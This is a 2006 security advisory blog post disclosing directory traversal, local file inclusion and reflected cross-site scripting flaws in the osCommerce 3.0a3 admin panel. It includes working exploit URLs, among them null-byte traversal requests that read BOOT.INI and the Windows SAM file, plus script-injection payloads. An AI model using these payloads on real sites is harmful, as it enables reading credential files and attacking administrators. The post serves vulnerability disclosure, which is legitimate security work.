############################################
Oscommerce traversal arbitrary file access
Vendor:http://www.oscommerce.com/about/news,125
Advisore:http://lostmon.blogspot.com/2006/12
/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
Securitytracker:1017353
BID:21477
###########################################
osCommerce contains a flaw that allows a remote traversal
arbitrary file access.This flaw exists because the application
does not validate filter variable upon submission to
admin/templates_boxes_layout.php script.This could allow a
remote authenticated administrator to create a specially
crafted URL that would execute '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.
####################
versions
####################
Oscommerce 3.0a3
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered:11-11-2006
vendor notify:------
vendor response:
disclosure:07-12-2006
#################
Examples
#################
######################
traversal file access
######################
wen we try to open
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=[SOME WORD]&lID=27
the aplication returns a full path disclosure and
returns this error:
Warning: require(includes/templates/[SOME WORD].php) [function.require]:
failed to open stream: No such file or directory in C:\AppServ\www oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13
Fatal error: require() [function.require]: Failed opening required
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_
boxes_layout.php on line 13
the aplication add the .php extension to our [SOME WORD] ummm
and it searh for the file in a folder inside webserver
we can include any php file located on the web server
in the aplication and it is executed(local file inclusion)
http://[victim]/admin/templates_boxes_layout.php?
set=boxes&filter=../../our_evil_php_file&lID=27
if we try to read a file outside webserver folder with a non php
extension can try for test this...
&filter=../../../../file.extension%00 for look for example boot.ini
in a windows system
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=../../../../BOOT.INI%00&lID=27
http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=content&filter=../../../../windows/repair/sam%00&lID=27
#####################
Cross site scripting
#####################
http://localhost/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://localhost/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)